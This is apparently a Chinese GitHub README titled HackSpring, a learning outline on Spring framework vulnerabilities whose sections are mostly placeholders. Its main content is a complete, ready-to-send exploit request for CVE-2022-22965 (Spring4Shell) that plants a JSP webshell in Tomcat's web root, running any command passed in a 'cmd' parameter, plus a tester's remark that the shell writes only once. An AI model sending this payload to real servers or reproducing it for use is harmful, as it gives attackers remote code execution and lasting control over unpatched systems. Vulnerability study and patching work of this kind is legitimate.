/HackSpring

《Spring漏洞学习》

HackSpring-永恒之春

本项目用来致敬全宇宙最无敌Spring框架!同时也记录自己在学习Spring漏洞过程中遇到的一些内容。本项目会持续更新,本项目创建于2022年3月30日,最近的一次更新时间为2022年4月1日。作者:0e0w

01-Spring基础知识

02-Spring框架识别

  • 待更新

03-Spring上层建筑

Spring + ? = rce !

04-Spring漏洞汇总

  • CVE-2022-22965

05-Spring检测利用

如何判断一个网站是否存在Spring漏洞?如何查找内网中存在Sprin漏洞?

一、Payload

POST / HTTP/1.1
Host: 127.0.0.1:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 761

class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22S%22.equals(request.getParameter(%22Tomcat%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=Shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

二、源码检测

三、漏洞验证

  • 测试时发现webshell只能写入一次!第二次失败!

四、漏洞扫描

五、其他工具

06-Spring漏洞修复

07-Spring分析文章

08-Spring靶场环境

Stargazers over time